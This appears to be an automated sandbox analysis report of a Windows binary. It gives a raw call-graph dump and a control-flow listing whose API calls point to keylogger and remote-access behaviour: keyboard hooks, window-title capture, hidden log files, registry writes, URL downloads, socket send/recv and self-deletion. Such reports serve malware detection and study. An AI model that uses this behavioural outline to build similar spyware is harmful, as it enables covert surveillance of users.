53973->54419 54420 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 53973->54420 54421 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 53973->54421 53974->53588 53979 402093 28 API calls 53978->53979 53980 40d9ff 53979->53980 53981 41bc5e 28 API calls 53980->53981 53982 40da0a 53981->53982 53983 40da34 32 API calls 53982->53983 53984 40da1b 53983->53984 53985 401f09 11 API calls 53984->53985 53986 40da24 53985->53986 53987 401fd8 11 API calls 53986->53987 53988 40da2c 53987->53988 53988->53623 53989->53608 53991->53652 53992->53455 53995 41b4c5 LoadResource LockResource SizeofResource 53994->53995 53996 40f3de 53994->53996 53995->53996 53996->53684 53998 4020b7 28 API calls 53997->53998 53999 406dec 53998->53999 53999->53695 54000->53699 54003 41bfc4 GetCurrentProcess IsWow64Process 54002->54003 54004 41b2d1 54002->54004 54003->54004 54005 41bfdb 54003->54005 54006 4135a6 RegOpenKeyExA 54004->54006 54005->54004 54007 4135d4 RegQueryValueExA RegCloseKey 54006->54007 54008 4135fe 54006->54008 54007->54008 54009 402093 28 API calls 54008->54009 54010 413613 54009->54010 54010->53708 54011->53716 54012->53730 54014 402347 54013->54014 54015 402252 11 API calls 54014->54015 54016 4023c7 54015->54016 54016->53730 54018 40a127 54017->54018 54019 413549 3 API calls 54018->54019 54020 40a12e 54019->54020 54021 40a142 54020->54021 54022 40a15c 54020->54022 54023 409e9b 54021->54023 54024 40a147 54021->54024 54038 40905c 54022->54038 54023->53581 54026 40905c 28 API calls 54024->54026 54028 40a155 54026->54028 54066 40a22d 29 API calls 54028->54066 54031 40a15a 54031->54023 54032->53770 54200 403222 54033->54200 54035 403022 54204 403262 54035->54204 54039 409072 54038->54039 54040 402252 11 API calls 54039->54040 54041 40908c 54040->54041 54042 404267 28 API calls 54041->54042 54043 40909a 54042->54043 54044 40a179 54043->54044 54067 40b8ec 54044->54067 54047 40a1a2 54049 402093 28 API calls 54047->54049 54048 40a1ca 54050 402093 28 API calls 54048->54050 54051 40a1ac 54049->54051 54052 40a1d5 54050->54052 54054 41bc5e 28 API calls 54051->54054 54053 402093 28 API calls 54052->54053 54055 40a1e4 54053->54055 54056 40a1ba 54054->54056 54057 41b4ef 80 API calls 54055->54057 54071 40b164 31 API calls new 54056->54071 54059 40a1e9 CreateThread 54057->54059 54061 40a210 CreateThread 54059->54061 54062 40a204 CreateThread 54059->54062 54079 40a27d 54059->54079 54060 40a1c1 54063 401fd8 11 API calls 54060->54063 54064 401f09 11 API calls 54061->54064 54076 40a289 54061->54076 54062->54061 54073 40a267 54062->54073 54063->54048 54065 40a224 54064->54065 54065->54023 54066->54031 54199 40a273 164 API calls 54066->54199 54068 40b8f5 54067->54068 54069 40a197 54067->54069 54072 40b96c 28 API calls 54068->54072 54069->54047 54069->54048 54071->54060 54072->54069 54082 40a2b8 54073->54082 54098 40acd6 54076->54098 54140 40a726 54079->54140 54083 40a2d1 GetModuleHandleA SetWindowsHookExA 54082->54083 54084 40a333 GetMessageA 54082->54084 54083->54084 54086 40a2ed GetLastError 54083->54086 54085 40a345 TranslateMessage DispatchMessageA 54084->54085 54096 40a270 54084->54096 54085->54084 54085->54096 54087 41bb8e 28 API calls 54086->54087 54088 40a2fe 54087->54088 54097 4052fd 28 API calls 54088->54097 54105 40ace4 54098->54105 54099 40a292 54100 40ad3e Sleep GetForegroundWindow GetWindowTextLengthW 54102 40b904 28 API calls 54100->54102 54102->54105 54105->54099 54105->54100 54107 41bae6 GetLastInputInfo GetTickCount 54105->54107 54108 40ad84 GetWindowTextW 54105->54108 54110 40aedc 54105->54110 54111 40b8ec 28 API calls 54105->54111 54113 40ae49 Sleep 54105->54113 54114 441e81 20 API calls 54105->54114 54116 402093 28 API calls 54105->54116 54117 40add1 54105->54117 54121 403014 28 API calls 54105->54121 54122 406383 28 API calls 54105->54122 54124 41bc5e 28 API calls 54105->54124 54125 40a636 12 API calls 54105->54125 54126 401f09 11 API calls 54105->54126 54127 401fd8 11 API calls 54105->54127 54128 4343e6 EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait 54105->54128 54129 401f86 54105->54129 54133 434770 23 API calls __onexit 54105->54133 54134 4343a7 SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_wait 54105->54134 54135 409044 28 API calls 54105->54135 54137 40b97c 28 API calls 54105->54137 54138 40b748 40 API calls 2 library calls 54105->54138 54139 4052fd 28 API calls 54105->54139 54107->54105 54108->54105 54112 401f09 11 API calls 54110->54112 54111->54105 54112->54099 54113->54105 54114->54105 54116->54105 54117->54105 54120 40905c 28 API calls 54117->54120 54136 40b164 31 API calls new 54117->54136 54120->54117 54121->54105 54122->54105 54124->54105 54125->54105 54126->54105 54127->54105 54130 401f8e 54129->54130 54131 402252 11 API calls 54130->54131 54132 401f99 54131->54132 54132->54105 54133->54105 54134->54105 54135->54105 54136->54117 54137->54105 54138->54105 54141 40a73b Sleep 54140->54141 54161 40a675 54141->54161 54143 40a286 54144 40a77b CreateDirectoryW 54149 40a74d 54144->54149 54145 40a78c GetFileAttributesW 54145->54149 54146 40a7a3 SetFileAttributesW 54146->54149 54147 4020df 11 API calls 54159 40a7ee 54147->54159 54149->54141 54149->54143 54149->54144 54149->54145 54149->54146 54151 401e65 22 API calls 54149->54151 54149->54159 54174 41c3f1 54149->54174 54150 40a81d PathFileExistsW 54150->54159 54151->54149 54153 4020b7 28 API calls 54153->54159 54154 40a926 SetFileAttributesW 54154->54149 54155 401fd8 11 API calls 54155->54159 54156 401fe2 28 API calls 54156->54159 54157 406dd8 28 API calls 54157->54159 54159->54147 54159->54150 54159->54153 54159->54154 54159->54155 54159->54156 54159->54157 54160 401fd8 11 API calls 54159->54160 54184 41c485 CreateFileW 54159->54184 54192 41c4f2 CreateFileW SetFilePointer CloseHandle WriteFile FindCloseChangeNotification 54159->54192 54160->54149 54162 40a722 54161->54162 54166 40a68b 54161->54166 54162->54149 54163 40a6aa CreateFileW 54164 40a6b8 GetFileSize 54163->54164 54163->54166 54165 40a6ed FindCloseChangeNotification 54164->54165 54164->54166 54165->54166 54166->54163 54166->54165 54167 40a6ff 54166->54167 54168 40a6e2 Sleep 54166->54168 54169 40a6db 54166->54169 54167->54162 54171 40905c 28 API calls 54167->54171 54168->54165 54193 40b0dc 84 API calls 54169->54193 54172 40a71b 54171->54172 54173 40a179 125 API calls 54172->54173 54173->54162 54175 41c404 CreateFileW 54174->54175 54177 41c441 54175->54177 54178 41c43d 54175->54178 54179 41c461 WriteFile 54177->54179 54180 41c448 SetFilePointer 54177->54180 54178->54149 54182 41c474 54179->54182 54183 41c476 FindCloseChangeNotification 54179->54183 54180->54179 54181 41c458 CloseHandle 54180->54181 54181->54178 54182->54183 54183->54178 54185 41c4ab 54184->54185 54186 41c4af GetFileSize 54184->54186 54185->54159 54194 40244e 54186->54194 54188 41c4c3 54189 41c4d5 ReadFile 54188->54189 54190 41c4e2 54189->54190 54191 41c4e4 FindCloseChangeNotification 54189->54191 54190->54191 54191->54185 54192->54159 54193->54168 54195 402456 54194->54195 54197 402460 54195->54197 54198 402a51 28 API calls 54195->54198 54197->54188 54198->54197 54201 40322e 54200->54201 54210 403618 54201->54210 54203 40323b 54203->54035 54205 40326e 54204->54205 54206 402252 11 API calls 54205->54206 54207 403288 54206->54207 54208 402336 11 API calls 54207->54208 54209 403031 54208->54209 54209->53774 54211 403626 54210->54211 54212 403644 54211->54212 54213 40362c 54211->54213 54215 40369e 54212->54215 54217 40365c 54212->54217 54221 4036a6 54213->54221 54230 4028a4 22 API calls 54215->54230 54219 4027e6 28 API calls 54217->54219 54220 403642 54217->54220 54219->54220 54220->54203 54222 402888 22 API calls 54221->54222 54223 4036b9 54222->54223 54224 40372c 54223->54224 54225 4036de 54223->54225 54231 4028a4 22 API calls 54224->54231 54228 4027e6 28 API calls 54225->54228 54229 4036f0 54225->54229 54228->54229 54229->54220 54237 404353 54232->54237 54234 40430a 54235 403262 11 API calls 54234->54235 54236 404319 54235->54236 54236->53783 54238 40435f 54237->54238 54241 404371 54238->54241 54240 40436d 54240->54234 54242 40437f 54241->54242 54243 404385 54242->54243 54244 40439e 54242->54244 54305 4034e6 28 API calls 54243->54305 54245 402888 22 API calls 54244->54245 54246 4043a6 54245->54246 54248 404419 54246->54248 54249 4043bf 54246->54249 54306 4028a4 22 API calls 54248->54306 54251 4027e6 28 API calls 54249->54251 54260 40439c 54249->54260 54251->54260 54260->54240 54305->54260 54313 43aa9a 54307->54313 54311 4138b9 54310->54311 54312 41388f RegSetValueExA RegCloseKey 54310->54312 54311->53799 54312->54311 54316 43aa1b 54313->54316 54315 40170d 54315->53801 54317 43aa2a 54316->54317 54318 43aa3e 54316->54318 54322 4405dd 20 API calls _abort 54317->54322 54321 43aa2f __alldvrm _strftime 54318->54321 54323 448957 11 API calls 2 library calls 54318->54323 54321->54315 54322->54321 54323->54321 54327 41b8f9 ctype ___scrt_get_show_window_mode 54324->54327 54325 402093 28 API calls 54326 414f49 54325->54326 54326->53808 54327->54325 54328->53825 54330 414f02 WSASetLastError 54329->54330 54331 414ef8 54329->54331 54330->53853 54358 414d86 29 API calls ___std_exception_copy 54331->54358 54333 414efd 54333->54330 54359 41b7b6 GlobalMemoryStatusEx 54335->54359 54337 41b7f5 54337->53853 54360 414580 54338->54360 54342 40dda5 54341->54342 54343 4134ff 3 API calls 54342->54343 54345 40ddac 54343->54345 54344 40ddc4 54344->53853 54345->54344 54346 413549 3 API calls 54345->54346 54346->54344 54348 4020b7 28 API calls 54347->54348 54349 41bc57 54348->54349 54349->53853 54350->53853 54352 402093 28 API calls 54351->54352 54353 40f8f6 54352->54353 54353->53853 54354->53853 54355->53853 54357->53853 54358->54333 54359->54337 54363 414553 54360->54363 54364 414568 ___scrt_initialize_default_local_stdio_options 54363->54364 54367 43f79d 54364->54367 54370 43c4f0 54367->54370 54371 43c518 54370->54371 54373 43c530 54370->54373 54392 4405dd 20 API calls _abort 54371->54392 54373->54371 54374 43c538 54373->54374 54393 43a7b7 36 API calls 2 library calls 54374->54393 54376 43c548 54394 43cc76 20 API calls 2 library calls 54376->54394 54377 43c51d _strftime 54385 434fcb 54377->54385 54380 414576 54380->53853 54381 43c5c0 54395 43d2e4 51 API calls 3 library calls 54381->54395 54384 43c5cb 54396 43cce0 20 API calls _free 54384->54396 54386 434fd6 IsProcessorFeaturePresent 54385->54386 54387 434fd4 54385->54387 54389 435018 54386->54389 54387->54380 54397 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 54389->54397 54391 4350fb 54391->54380 54392->54377 54393->54376 54394->54381 54395->54384 54396->54377 54397->54391 54400 40ddd9 54399->54400 54401 402252 11 API calls 54400->54401 54402 40dde4 54401->54402 54403 4041d9 28 API calls 54402->54403 54404 40dbd0 54403->54404 54405 402fa5 54404->54405 54410 402fb4 54405->54410 54406 402ff6 54416 40323f 54406->54416 54408 402ff4 54409 403262 11 API calls 54408->54409 54411 40300d 54409->54411 54410->54406 54412 402feb 54410->54412 54411->53939 54415 403211 28 API calls 54412->54415 54414->53917 54415->54408 54417 4036a6 28 API calls 54416->54417 54418 40324c 54417->54418 54418->54408 54419->53973 54424 40f7c2 54422->54424 54423 413549 3 API calls 54423->54424 54424->54423 54426 40f866 54424->54426 54427 40f856 Sleep 54424->54427 54444 40f7f4 54424->54444 54425 40905c 28 API calls 54425->54444 54428 40905c 28 API calls 54426->54428 54427->54424 54431 40f871 54428->54431 54430 41bc5e 28 API calls 54430->54444 54432 41bc5e 28 API calls 54431->54432 54433 40f87d 54432->54433 54456 413814 14 API calls 54433->54456 54436 401f09 11 API calls 54436->54444 54437 40f890 54438 401f09 11 API calls 54437->54438 54440 40f89c 54438->54440 54439 402093 28 API calls 54439->54444 54441 402093 28 API calls 54440->54441 54442 40f8ad 54441->54442 54445 41376f 14 API calls 54442->54445 54443 41376f 14 API calls 54443->54444 54444->54425 54444->54427 54444->54430 54444->54436 54444->54439 54444->54443 54454 40d096 112 API calls ___scrt_get_show_window_mode 54444->54454 54455 413814 14 API calls 54444->54455 54446 40f8c0 54445->54446 54457 412850 TerminateProcess WaitForSingleObject 54446->54457 54448 40f8c8 ExitProcess 54455->54444 54456->54437 54457->54448 54458 40a2a4 54461 40a367 54458->54461 54460 40a2b5 54462 40a384 54461->54462 54463 40a3c7 CallNextHookEx 54461->54463 54464 40a3b0 54462->54464 54465 40a38f 54462->54465 54463->54460 54474 40b221 54464->54474 54466 40a3a2 54465->54466 54467 40a394 54465->54467 54532 40b6a0 30 API calls 54466->54532 54467->54463 54531 40b646 38 API calls 54467->54531 54472 40a3a0 54472->54463 54475 40b230 54474->54475 54476 402093 28 API calls 54475->54476 54477 40a3bc 54475->54477 54478 40b4bd 54476->54478 54477->54463 54480 40b4ed 54477->54480 54533 40a611 29 API calls 54478->54533 54481 40b630 54480->54481 54482 40b507 54480->54482 54534 40a3e0 54481->54534 54483 40b58b 54482->54483 54484 40b50d 54482->54484 54488 402093 28 API calls 54483->54488 54486 40b62e 54484->54486 54491 402093 28 API calls 54484->54491 54486->54463 54490 40b599 54488->54490 54492 402093 28 API calls 54490->54492 54494 40b535 54491->54494 54493 40b5a7 54492->54493 54495 41bc5e 28 API calls 54493->54495 54544 43fcc6 44 API calls 54494->54544 54497 40b5b7 54495->54497 54547 40b70e 31 API calls 54497->54547 54498 40b543 54499 402093 28 API calls 54498->54499 54501 40b553 54499->54501 54545 40919d 28 API calls 54501->54545 54502 40b5ca 54504 41bc5e 28 API calls 54502->54504 54506 40b5d8 54504->54506 54505 40b55e 54507 402ea1 28 API calls 54505->54507 54508 402fa5 28 API calls 54506->54508 54509 40b568 54507->54509 54510 40b5e3 54508->54510 54546 40a611 29 API calls 54509->54546 54512 402fa5 28 API calls 54510->54512 54514 40b5ed 54512->54514 54513 40b570 54515 401fd8 11 API calls 54513->54515 54548 40a636 12 API calls 54514->54548 54517 40b579 54515->54517 54519 401fd8 11 API calls 54517->54519 54518 40b5f5 54520 401f09 11 API calls 54518->54520 54530 40b582 54519->54530 54521 40b5fe 54520->54521 54522 401f09 11 API calls 54521->54522 54523 40b607 54522->54523 54525 401f09 11 API calls 54523->54525 54524 401fd8 11 API calls 54524->54486 54526 40b610 54525->54526 54527 401f09 11 API calls 54526->54527 54528 40b61c 54527->54528 54529 401fd8 11 API calls 54528->54529 54529->54530 54530->54524 54531->54472 54532->54472 54533->54477 54535 436e90 ___scrt_get_show_window_mode 54534->54535 54536 40a401 6 API calls 54535->54536 54537 40a4d6 54536->54537 54539 40a468 ___scrt_get_show_window_mode 54536->54539 54538 40a4e6 ToUnicodeEx 54537->54538 54538->54538 54540 40a4cd 54538->54540 54539->54540 54543 40a4a4 ToUnicodeEx 54539->54543 54541 40417e 28 API calls 54540->54541 54542 40a515 54541->54542 54549 40a636 12 API calls 54542->54549 54543->54540 54544->54498 54545->54505 54546->54513 54547->54502 54548->54518 54549->54486 54550 4269e6 54551 4269fb 54550->54551 54558 426a8d 54550->54558 54552 426a48 54551->54552 54553 426b44 54551->54553 54554 426abd 54551->54554 54555 426b1d 54551->54555 54551->54558 54561 426af2 54551->54561 54563 426a7d 54551->54563 54578 424edd 49 API calls ctype 54551->54578 54552->54558 54552->54563 54579 41fb6c 52 API calls 54552->54579 54553->54558 54583 426155 28 API calls 54553->54583 54554->54558 54554->54561 54581 41fb6c 52 API calls 54554->54581 54555->54553 54555->54558 54566 425ae1 54555->54566 54561->54555 54582 4256f0 21 API calls 54561->54582 54563->54554 54563->54558 54580 424edd 49 API calls ctype 54563->54580 54568 425b00 ___scrt_get_show_window_mode 54566->54568 54567 425b14 54573 425b1d 54567->54573 54576 425b34 54567->54576 54591 41da5f 49 API calls 54567->54591 54570 425b0f 54568->54570 54568->54576 54584 41ebbb 21 API calls 54568->54584 54570->54567 54570->54576 54585 4205d8 46 API calls 54570->54585 54573->54576 54592 424d05 21 API calls 2 library calls 54573->54592 54575 425bb7 54575->54576 54586 432ec4 54575->54586 54576->54553 54578->54552 54579->54552 54580->54554 54581->54554 54582->54555 54583->54558 54584->54570 54585->54575 54587 432ed2 54586->54587 54588 432ece 54586->54588 54589 43bd51 new 21 API calls 54587->54589 54588->54567 54590 432ed7 54589->54590 54590->54567 54591->54573 54592->54576 54593 415d06 54608 41b380 54593->54608 54595 415d0f 54596 4020f6 28 API calls 54595->54596 54597 415d1e 54596->54597 54598 404aa1 61 API calls 54597->54598 54599 415d2a 54598->54599 54600 417089 54599->54600 54601 401fd8 11 API calls 54599->54601 54602 401e8d 11 API calls 54600->54602 54601->54600 54603 417092 54602->54603 54604 401fd8 11 API calls 54603->54604 54605 41709e 54604->54605 54606 401fd8 11 API calls 54605->54606 54607 4170aa 54606->54607 54609 4020df 11 API calls 54608->54609 54610 41b38e 54609->54610 54611 43bd51 new 21 API calls 54610->54611 54612 41b39e InternetOpenW InternetOpenUrlW 54611->54612 54613 41b3c5 InternetReadFile 54612->54613 54617 41b3e8 54613->54617 54614 41b415 InternetCloseHandle InternetCloseHandle 54616 41b427 54614->54616 54615 4020b7 28 API calls 54615->54617 54616->54595 54617->54613 54617->54614 54617->54615 54618 401fd8 11 API calls 54617->54618 54618->54617 54619 426c4b 54624 426cc8 send 54619->54624 54625 274cc7a7 54626 274cc7be 54625->54626 54630 274cc82c 54625->54630 54626->54630 54637 274cc7e6 GetModuleHandleA 54626->54637 54628 274cc835 GetModuleHandleA 54631 274cc83f 54628->54631 54629 274cc872 54630->54628 54630->54629 54630->54631 54631->54630 54632 274cc85f GetProcAddress 54631->54632 54632->54630 54633 274cc7dd 54633->54630 54633->54631 54634 274cc800 GetProcAddress 54633->54634 54634->54630 54635 274cc80d VirtualProtect 54634->54635 54635->54630 54636 274cc81c VirtualProtect 54635->54636 54636->54630 54638 274cc7ef 54637->54638 54644 274cc82c 54637->54644 54649 274cc803 GetProcAddress 54638->54649 54640 274cc7f4 54643 274cc800 GetProcAddress 54640->54643 54640->54644 54641 274cc835 GetModuleHandleA 54646 274cc83f 54641->54646 54642 274cc872 54643->54644 54645 274cc80d VirtualProtect 54643->54645 54644->54641 54644->54642 54644->54646 54645->54644 54647 274cc81c VirtualProtect 54645->54647 54646->54644 54648 274cc85f GetProcAddress 54646->54648 54647->54644 54648->54644 54650 274cc82c 54649->54650 54651 274cc80d VirtualProtect 54649->54651 54653 274cc835 GetModuleHandleA 54650->54653 54654 274cc872 54650->54654 54651->54650 54652 274cc81c VirtualProtect 54651->54652 54652->54650 54656 274cc83f 54653->54656 54655 274cc85f GetProcAddress 54655->54656 54656->54650 54656->54655 54657 42f8ed 54658 42f8f8 54657->54658 54659 42f90c 54658->54659 54661 432eee 54658->54661 54662 432efd 54661->54662 54664 432ef9 54661->54664 54665 440f0d 54662->54665 54664->54659 54666 446185 54665->54666 54667 446192 54666->54667 54668 44619d 54666->54668 54678 446137 54667->54678 54670 4461a5 54668->54670 54676 4461ae ___crtLCMapStringA 54668->54676 54685 446782 54670->54685 54672 4461b3 54691 4405dd 20 API calls _abort 54672->54691 54673 4461d8 RtlReAllocateHeap 54674 44619a 54673->54674 54673->54676 54674->54664 54676->54672 54676->54673 54692 442f80 7 API calls 2 library calls 54676->54692 54679 446175 54678->54679 54680 446145 ___crtLCMapStringA 54678->54680 54694 4405dd 20 API calls _abort 54679->54694 54680->54679 54682 446160 RtlAllocateHeap 54680->54682 54693 442f80 7 API calls 2 library calls 54680->54693 54682->54680 54683 446173 54682->54683 54683->54674 54686 44678d RtlFreeHeap 54685->54686 54687 4467b6 __dosmaperr 54685->54687 54686->54687 54688 4467a2 54686->54688 54687->54674 54695 4405dd 20 API calls _abort 54688->54695 54690 4467a8 GetLastError 54690->54687 54691->54674 54692->54676 54693->54680 54694->54683 54695->54690 54696 44375d 54697 44377f 54696->54697 54698 443766 54696->54698 54699 44376e 54698->54699 54703 4437e5 54698->54703 54701 443776 54701->54699 54714 443ab2 22 API calls 2 library calls 54701->54714 54704 4437f1 54703->54704 54705 4437ee 54703->54705 54715 44f3dd GetEnvironmentStringsW 54704->54715 54705->54701 54709 446782 _free 20 API calls 54711 443833 54709->54711 54710 443809 54712 446782 _free 20 API calls 54710->54712 54711->54701 54713 4437fe 54712->54713 54713->54709 54714->54697 54716 4437f8 54715->54716 54717 44f3f1 54715->54717 54716->54713 54722 44390a 26 API calls 3 library calls 54716->54722 54718 446137 ___crtLCMapStringA 21 API calls 54717->54718 54719 44f405 ctype 54718->54719 54720 446782 _free 20 API calls 54719->54720 54721 44f41f FreeEnvironmentStringsW 54720->54721 54721->54716 54722->54710 54723 43be58 54725 43be64 _swprintf ___DestructExceptionObject 54723->54725 54724 43be72 54739 4405dd 20 API calls _abort 54724->54739 54725->54724 54727 43be9c 54725->54727 54734 445888 EnterCriticalSection 54727->54734 54729 43bea7 54735 43bf48 54729->54735 54730 43be77 _strftime ___DestructExceptionObject 54734->54729 54736 43bf56 54735->54736 54738 43beb2 54736->54738 54741 44976c 37 API calls 2 library calls 54736->54741 54740 43becf LeaveCriticalSection std::_Lockit::~_Lockit 54738->54740 54739->54730 54740->54730 54741->54736 54742 41dfbd 54743 41dfd2 ctype ___scrt_get_show_window_mode 54742->54743 54744 41e1d5 54743->54744 54746 432ec4 21 API calls 54743->54746 54748 41e189 54744->54748 54756 41db62 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 54744->54756 54750 41e182 ___scrt_get_show_window_mode 54746->54750 54747 41e1e6 54747->54748 54749 432ec4 21 API calls 54747->54749 54752 41e21f ___scrt_get_show_window_mode 54749->54752 54750->54748 54751 432ec4 21 API calls 54750->54751 54754 41e1af ___scrt_get_show_window_mode 54751->54754 54752->54748 54757 43354a 54752->54757 54754->54748 54755 432ec4 21 API calls 54754->54755 54755->54744 54756->54747 54760 433469 54757->54760 54759 433552 54759->54748 54761 433482 54760->54761 54765 433478 54760->54765 54762 432ec4 21 API calls 54761->54762 54761->54765 54763 4334a3 54762->54763 54763->54765 54766 433837 CryptAcquireContextA 54763->54766 54765->54759 54767 433853 54766->54767 54768 433858 CryptGenRandom 54766->54768 54767->54765 54768->54767 54769 43386d CryptReleaseContext 54768->54769 54769->54767 54770 40165e 54771 401666 54770->54771 54773 401669 54770->54773 54772 4016a8 54774 4344ea new 22 API calls 54772->54774 54773->54772 54775 401696 54773->54775 54776 40169c 54774->54776 54777 4344ea new 22 API calls 54775->54777 54777->54776 54778 426bdc 54784 426cb1 recv 54778->54784

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 0040E9C5 Relevance: 86.5, APIs: 15, Strings: 34, Instructions: 795COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 5 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 22 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 5->23 69 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 22->69 70 40ebae-40ebc9 call 401e65 call 40b9bd 22->70 49 40eef2-40ef03 call 401fd8 23->49 69->70 102 40f34f-40f36a call 401fab call 4139a9 call 412475 69->102 79 40ec03-40ec0a call 40d069 70->79 80 40ebcb-40ebea call 401fab call 413549 70->80 90 40ec13-40ec1a 79->90 91 40ec0c-40ec0e 79->91 80->79 98 40ebec-40ec02 call 401fab call 4139a9 80->98 93 40ec1c 90->93 94 40ec1e-40ec2a call 41b2c3 90->94 92 40eef1 91->92 92->49 93->94 103 40ec33-40ec37 94->103 104 40ec2c-40ec2e 94->104 98->79 124 40f36f-40f3a0 call 41bc5e call 401f04 call 413a23 call 401f09 * 2 102->124 107 40ec76-40ec89 call 401e65 call 401fab 103->107 108 40ec39 call 407716 103->108 104->103 129 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 107->129 130 40ec8b call 407755 107->130 118 40ec3e-40ec40 108->118 121 40ec42-40ec47 call 407738 call 407260 118->121 122 40ec4c-40ec5f call 401e65 call 401fab 118->122 121->122 122->107 141 40ec61-40ec67 122->141 157 40f3a5-40f3af call 40dd42 call 414f2a 124->157 177 40ed80-40ed84 129->177 178 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 129->178 130->129 141->107 144 40ec69-40ec6f 141->144 144->107 147 40ec71 call 407260 144->147 147->107 179 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 177->179 180 40ed8a-40ed91 177->180 178->177 202 40ed35-40ed7b call 401e65 call 401fab call 401e65 call 401fab call 40da34 call 401f13 call 401f09 178->202 233 40ef6b-40efbf call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 179->233 182 40ed93-40ee0d call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 180->182 183 40ee0f-40ee19 call 409057 180->183 192 40ee1e-40ee42 call 40247c call 434798 182->192 183->192 210 40ee51 192->210 211 40ee44-40ee4f call 436e90 192->211 202->177 216 40ee53-40ee9e call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 210->216 211->216 271 40eea3-40eec8 call 4347a1 call 401e65 call 40b9bd 216->271 286 40efc1 233->286 287 40efdc-40efde 233->287 271->233 288 40eece-40eeed call 401e65 call 41bc5e call 40f474 271->288 289 40efc3-40efda call 41cd9b CreateThread 286->289 290 40efe0-40efe2 287->290 291 40efe4 287->291 288->233 305 40eeef 288->305 294 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 289->294 290->289 291->294 344 40f101 294->344 345 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 294->345 305->92 347 40f103-40f11b call 401e65 call 401fab 344->347 345->347 356 40f159-40f16c call 401e65 call 401fab 347->356 357 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 347->357 368 40f1cc-40f1df call 401e65 call 401fab 356->368 369 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 356->369 357->356 379 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 368->379 380 40f21a-40f23e call 41b60d call 401f13 call 401f09 368->380 369->368 379->380 400 40f240-40f241 SetProcessDEPPolicy 380->400 401 40f243-40f256 CreateThread 380->401 400->401 404 40f264-40f26b 401->404 405 40f258-40f262 CreateThread 401->405 408 40f279-40f280 404->408 409 40f26d-40f277 CreateThread 404->409 405->404 412 40f282-40f285 408->412 413 40f28e 408->413 409->408 415 40f287-40f28c 412->415 416 40f2cc-40f2df call 401fab call 4134ff 412->416 418 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 413->418 415->418 426 40f2e4-40f2e7 416->426 418->416 426->157 428 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 426->428 443 40f346-40f34b DeleteFileW 428->443 444 40f34d 443->444 445 40f32f-40f332 443->445 444->124 445->124 446 40f334-40f341 Sleep call 401f04 445->446 446->443
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                                                                                                                                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                                                                                                                                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                                                                                                                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                                                                                                                                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                                                                                                                                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                                                                                                                                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                                                                                                                                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                                                                                                                                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                                                                                                                                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                                                                                                                                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                                                                                                                                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                                                                                                                                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                                                                                                                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
